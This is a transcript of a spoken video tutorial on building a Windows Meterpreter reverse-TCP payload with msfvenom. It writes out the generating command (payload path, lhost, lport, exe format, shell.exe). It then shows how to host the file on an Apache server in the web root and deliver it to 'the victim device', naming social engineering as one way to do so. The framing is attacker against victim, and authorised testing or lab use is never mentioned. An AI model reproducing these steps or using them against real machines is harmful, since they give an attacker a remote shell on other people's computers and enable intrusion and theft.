Hi, welcome back to my video. In this video, you are going to learn creating a payload using MSFVenom. So what is MSFVenom? MSFVenom is a mixture of MSF payload and MSF encode. Both are combined into a single command. This was done because the MSF encoding and MSF payload were having different types of encoding. So that was really difficult for exploitation. So for that, they created MSFVenom. So that's a small introduction of an MSFVenom. Now open your terminal and type MSFVenom -h. The H option stands for help. Here you can see many options used to create a different types of payloads. Now in these options we are going to use P. P stands for the payload, and F. F stands for the file format. And if you are making use of Arch, then you need to use -a. So these three options are commonly used to create a payload. And now typing MSFVenom P Windows /meterpreter /reverse TCP lhost equal to IP address, and the L port equal to port number F exe. So here I am creating the exe file. So for that I am using the file format as exe, and next and the file name shell.exe. So as I told you, the P stands for the payload and F stands for the file format. What is Windows /meterpreter /reverse TCP? So this is a model. By using this model, we are going to create a payload for the Windows. If you are going to create a payload for Linux, then we are going to use Linux /meterpreter /reverse TCP. And next, moving to the lhost. The lhost is a very important part of creating a payload, because when you create a payload, the victim PC must be connected to one of the network. So it's really necessary to add the lhost. The lhost stands for the localhost, which is your IP address. And there is also an rhost, which is called as remote host. The remote host stands for the victim IP address. Now moving to the L port. To maintain a connection between the victim and the attacker PC, so we use L port. After typing everything, then press enter, then wait for a while. Okay, here I got created the payload. The most important question asked by all the students is that how to send the payload to the victim device. So for that there are two techniques. One is social engineering, or you can create your own server on Linux. Here I am typing service apache 2 start, then pressing enter. Now moving to the folder, click on where folder. In that www and html. Now I am pasting it here. Now opening the browser and then typing my IP address. You can type your IP address. So now here you can see the shell.exe payload. So that's how we are going to create a payload and send it to the victim device. So if you are creating any payload based on Android, Linux or Windows, follow these steps and create a payload. That's all in this video. Thank you.